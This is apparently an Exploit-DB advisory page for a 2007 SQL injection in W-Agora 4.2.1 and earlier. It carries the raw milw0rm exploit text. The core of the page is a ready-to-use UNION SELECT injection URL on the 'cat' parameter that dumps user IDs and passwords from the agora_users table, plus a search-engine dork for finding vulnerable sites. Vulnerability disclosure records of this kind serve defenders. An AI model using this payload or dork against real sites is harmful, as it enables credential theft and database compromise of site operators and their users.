header-logo
Suggest Exploit
vendor:
W-Agora
by:
ihteam.net
N/A
CVSS
HIGH
SQL Injection
89
CWE
Product Name: W-Agora
Affected Version From: Up to version 4.2.1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:w-agora:w-agora:4.2.1
Metasploit:
Other Scripts:
Platforms Tested:
2007

W-Agora <= 4.2.1 SQL Injection

The W-Agora version 4.2.1 is vulnerable to SQL Injection. By exploiting this vulnerability, an attacker can execute arbitrary SQL queries on the database.

Mitigation:

The vendor has not provided a specific mitigation for this vulnerability. It is recommended to update to a newer version of W-Agora if available.
Source

Exploit-DB raw data:

#########################################################################################
#
#         [W-Agora <= 4.2.1]
#
# Class:     SQL Injection  # Found:     30/12/2007 # Remote:    Yes  # Site:      http://w-agora.net
# Download:  http://sourceforge.net/project/showfiles.php?group_id=3413
#   #########################################################################################

        Exploit :
===================================================================================================================================================================================================================
http://site.com/[w-agora_path]/index.php?site=[site_name]&cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat(userid,0x3a,password),24/**/FROM/**/agora_users/*
===================================================================================================================================================================================================================


        Thanks To:
=========================
All ihteam.net members;
=========================

DORK: allinurl:"index.php?site=" "W-Agora"

#ihteam.net - Inclusion Hunter Team 

# milw0rm.com [2007-12-30]